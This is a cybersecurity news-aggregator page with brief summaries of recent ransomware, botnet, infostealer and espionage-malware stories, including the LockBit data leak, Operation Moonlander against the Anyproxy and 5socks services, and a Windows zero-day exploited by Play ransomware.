Malware News, Latest Updates and Recent Announcements on Techminis

A naukri.com initiative

New

Home

Malware News

Cybersecurity-Insiders

11h

312

Image Credit: Cybersecurity-Insiders

What should we learn from International Anti Ransomware Day

International Anti-Ransomware Day is observed annually on May 12th to raise awareness and promote prevention measures against ransomware attacks.
Lessons from the day include emphasizing prevention through regular updates and strong security measures, highlighting the importance of secure backups, raising awareness about cybersecurity for all users, and discouraging ransom payments.
The day commemorates the WannaCry attack and underscores the need for collaboration among governments, agencies, and organizations to combat cybercrime effectively.
Education on cybersecurity and the implementation of policies to enhance cyber resilience are crucial in mitigating ransomware threats, emphasizing that cybersecurity is a shared responsibility for individuals and organizations.

Read Full Article

18 Likes

Kaspersky

14h

214

Image Credit: Kaspersky

The ransomware landscape in 2025 | Kaspersky official blog

Ransomware incidents show low quality of decryptors; attackers may not send decryptors or provide inefficient tools.
Cybercriminals often specialize in encryption, not decryption, leading to slow and faulty decryptors.
Ransomware attackers engage in repeated attacks, switching between groups and affiliates to continue extortion.
Legislation is tightening globally to combat ransomware, requiring companies to report incidents promptly.
Companies face risks and legal consequences for paying ransoms, as it can lead to long-term repercussions.
Paying ransoms does not guarantee data confidentiality, as data may still be leaked or disclosed.
Law enforcement actions and evolving laws have changed ransomware landscape, decreasing ransom amounts paid.
Ransomware groups are now more focused on espionage and mixed motives, complicating victim understanding.
Paying ransomware operators can worsen the problem; having a response plan in place is crucial for recovery.
Organizations should prepare detailed response plans and implement monitoring solutions to counter ransomware attacks effectively.

Read Full Article

12 Likes

TechCrunch

191

Image Credit: TechCrunch

FBI and Dutch police seize and shut down botnet of hacked routers

FBI and Dutch police have seized and shut down botnet services involving hacked internet-connected devices, including routers.
U.S. prosecutors indicted four individuals, including three Russians and one Kazakhstan national, for hacking into routers and running the botnet under the guise of legitimate proxy services.
The accused individuals targeted vulnerable internet-connected devices to build a botnet, offering access through services like Anyproxy and 5Socks and making over $46 million from selling botnet access.
Black Lotus Labs assisted in tracking the proxy networks used for malicious activities, with the botnet offering anonymity for cybercriminals and having about 1,000 weekly active proxies in over 80 countries.

Read Full Article

11 Likes

Securityaffairs

340

Image Credit: Securityaffairs

Cybercriminal services target end-of-life routers, FBI warns

The FBI warns that cybercriminal services are targeting end-of-life routers to deploy malware and sell them as proxies on 5Socks and Anyproxy networks.
End-of-life routers are vulnerable to cyber attacks due to the lack of security updates, making them easy targets for threat actors who exploit known vulnerabilities.
Infected routers are used to form botnets for coordinated attacks or sold as proxies, allowing threat actors persistent access and control over the compromised devices.
The FBI recommends replacing vulnerable routers with newer models or disabling remote administration and rebooting the devices to prevent further infections, as per the published indicators of compromise (IoCs) and mitigation strategies.

Read Full Article

20 Likes

Discover more

Cybersecurity-Insiders

Image Credit: Cybersecurity-Insiders

Ransomware news headlines trending on Google

The LockBit ransomware group, known for its cybercriminal activities, recently became a victim of a data breach, leading to the exposure of sensitive data.
Oettinger Breweries, a German beer producer, was targeted by the Ransom House ransomware group, resulting in the compromise of critical company data.
The Play Ransomware group is exploiting Windows vulnerabilities to launch attacks on businesses in various sectors, aiming to encrypt data and gather intelligence from compromised networks.
These incidents highlight the increasing threats posed by cybercriminals, with rivals targeting each other and forming alliances, emphasizing the critical need for robust cybersecurity measures and collaboration between public and private entities.

Read Full Article

1 Like

Securityaffairs

13h

Image Credit: Securityaffairs

Threat actors use fake AI tools to deliver the information stealer Noodlophile

Threat actors are using fake AI tools to distribute the information stealer Noodlophile, as warned by Morphisec researchers.
Attackers exploit the AI hype through viral posts and Facebook groups to trick users into downloading Noodlophile Stealer, a new malware that steals browser credentials and crypto wallets.
Noodlophile Stealer, a previously undisclosed malware, is being sold on cybercrime forums as part of malware-as-a-service schemes and is often bundled with tools for credential theft.
Fake AI tools like 'Dream Machine' or 'CapCut' spread through social media, attracting users seeking free video/image editors, but instead delivering malware like Noodlophile or XWorm.

Read Full Article

3 Likes

Cybersecurity-Insiders

21h

Image Credit: Cybersecurity-Insiders

DragonForce Ransomware targeting M&S vows not to target Russia or Soviet Union

DragonForce Ransomware, responsible for attacking Marks & Spencer, urges cybercriminals to avoid targeting businesses in Russia and the former Soviet Union.
Speculations arise about DragonForce's ties to Russia or possible funding from the post-Soviet region, leading them to show loyalty to these territories.
DragonForce emphasizes its policy of solely extorting money and not deleting valuable business data, aiming to preserve technology use in certain regions.
The group has targeted 90 companies across sectors, issuing warnings to rival groups like Scattered Spider not to attack networks in Russia, setting new boundaries in cybercrime operations.

Read Full Article

3 Likes

Securityaffairs

217

Image Credit: Securityaffairs

Security Affairs newsletter Round 523 by Pierluigi Paganini – INTERNATIONAL EDITION

437,329 patients' personal data exposed in Ascension cyberattack.
Operation Moonlander dismantles cybercriminal services Anyproxy and 5socks.
SonicWall fixes critical flaws in SMA 100.
NSO Group ordered to pay over $167M to WhatsApp for spyware campaign.

Read Full Article

13 Likes

Securityaffairs

Image Credit: Securityaffairs

Operation Moonlander dismantled the botnet behind Anyproxy and 5socks cybercriminals services

Operation Moonlander dismantled a 20-year botnet behind Anyproxy and 5socks cybercriminals services and arrested four suspects.
U.S. Justice Department charged Russian and Kazakhstani nationals for maintaining, operating, and profiting from Anyproxy and 5socks services.
The botnet operators enabled cryptocurrency payments and targeted IOT and SOHO devices for malicious activities like ad fraud, DDoS attacks, and brute force attacks.
FBI released a FLASH alert warning about 5Socks and Anyproxy malicious services targeting end-of-life routers and urged replacing compromised routers or preventing infection by disabling remote admin and rebooting.

Read Full Article

4 Likes

Cybersecurity-Insiders

284

Image Credit: Cybersecurity-Insiders

No cyber threat to India ATMs from Pakistan Ransomware Attack

Tensions between India and Pakistan have risen following a terrorist attack, prompting concerns of a potential ransomware attack on Indian ATMs by Pakistan's cyber army.
Misinformation on social media suggested that Indian ATMs would be shut down preventively, causing citizens to rush for cash withdrawals in fear of a banking crisis.
The Indian government has officially refuted these rumors, confirming that there are no plans to shut down ATMs and reassuring the public of the nation's readiness to handle cyber threats.
Authorities have advised citizens to use social media responsibly, conduct fact-checking, and beware of malware threats, such as the 'Dance of the Hillary' file circulating on mobile devices.

Read Full Article

17 Likes

Securityaffairs

136

Image Credit: Securityaffairs

Russia-linked ColdRiver used LostKeys malware in recent attacks

Russia-linked ColdRiver, also known as APT COLDRIVER, has been using LostKeys malware in recent espionage attacks on Western governments and organizations since early 2025.
The ColdRiver APT group primarily targets NATO countries, along with the Baltics, Nordics, and Eastern Europe, including Ukraine, focusing on government officials, military personnel, journalists, and think tanks.
LostKeys malware is deployed through a multi-step chain, starting with a fake CAPTCHA to trick users into running PowerShell scripts. It is capable of stealing files, sending system information to the attacker, and running processes.
Google’s Threat Intelligence Group discovered LostKeys malware in selective ClickFix attacks, with victims being tricked into running malicious PowerShell scripts that led to data theft via VBS payloads. Two additional samples were found dating back to December 2023, leading to uncertainty about their relation to COLDRIVER.

Read Full Article

8 Likes

Cybersecurity-Insiders

204

Image Credit: Cybersecurity-Insiders

Ransomware Resurgence: 5 Lessons from Healthcare’s Cyber Frontlines

Healthcare organizations faced a surge in ransomware attacks in 2024, with recovery costs averaging over $2.5 million per incident.
Ransomware-as-a-service has made attacks more accessible, with healthcare being targeted due to the critical nature of operations.
Patient data is highly valuable and often sold on the dark web, contributing to the attractiveness of healthcare systems to cybercriminals.
Legacy systems and connected devices in healthcare present security risks that can be exploited by ransomware attackers.
Ransomware attacks not only incur financial costs but also severely impact patient care and safety, leading to delayed treatments and diverted emergency services.
Healthcare organizations need to bolster cybersecurity measures, with many still allocating less than 10% of their IT budget to cybersecurity.
Recommendations for strengthening resilience include regular risk assessments, advanced cybersecurity tools, staff training, secure backups, and access controls.
Ransomware attacks pose a threat to patient safety and public health, necessitating proactive cybersecurity measures in healthcare.
The sophistication of ransomware groups and their focus on healthcare systems emphasize the importance of investing in solutions for network defense and operational continuity.
Cybersecurity is crucial for patient outcomes in healthcare, requiring investments in proactive defense measures to combat escalating cyber threats.

Read Full Article

12 Likes

Qualys

294

Image Credit: Qualys

Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations

The LockBit ransomware gang recently faced a data breach with dark web panels defaced, leading to a MySQL database dump.
The leaked data includes victim negotiation messages and bitcoin addresses from LockBit's affiliate panel.
LockBit has evolved since 2019, releasing versions like LockBit 2.0 and LockBit 3.0 with expanded capabilities.
LockBit operates on an affiliate model, where core developers create ransomware and affiliates execute attacks.
Their attacks involve initial access, lateral movement, data exfiltration, encryption, and ransom note delivery.
Leaked chats indicate LockBit demands ransom payment in Bitcoin and offers discounts for payments in Monero.
The article highlights critical CVEs exploited by LockBit that organizations should prioritize patching or mitigating.
Systems beyond traditional endpoints like Veeam, vCenter, ESXi, NAS devices, and file transfer tools are also targeted by LockBit.
Recommendations include patching known vulnerabilities, securing backup infrastructure, and enforcing strong credentials.
Understanding LockBit's tactics and enhancing security hygiene are crucial to bolster defenses against ransomware threats.

Read Full Article

17 Likes

Securityaffairs

348

Image Credit: Securityaffairs

The LockBit ransomware site was breached, database dump was leaked online

The LockBit ransomware group's dark web site was compromised, leading to the leak of data from the backend infrastructure.
Hackers defaced the dark web site and posted a message along with a link to a dump of the MySQL database containing various data, including victim chat logs and user data.
BleepingComputer analyzed the leaked database, revealing 20 tables with information such as BTC addresses, victim chat logs, and user data with plaintext passwords.
Italian cybersecurity expert Emanuele De Lucia extracted over 60k addresses from the dump, indicating the potential presence of critical data for developing decryption tools. The chat logs showed ransom amounts ranging from $50,000 to $1,500,000.

Read Full Article

20 Likes

Securityaffairs

392

Image Credit: Securityaffairs

Play ransomware affiliate leveraged zero-day to deploy malware

The Play ransomware gang exploited a Windows Common Log File System flaw in zero-day attacks to deploy malware, gaining SYSTEM privileges on compromised systems.
The vulnerability, CVE-2025-29824, allowed attackers to elevate privileges locally, leading to confirmed exploits in the wild by the Play ransomware gang.
Microsoft addressed the flaw in April's Patch Tuesday security updates, after it was added to the Known Exploited Vulnerabilities catalog by CISA.
The exploit was used by multiple threat actors before being patched, with connections to malware like PipeMagic and Storm-2460, used by Balloonfly cybercrime group.

Read Full Article

23 Likes

For uninterrupted reading, download the app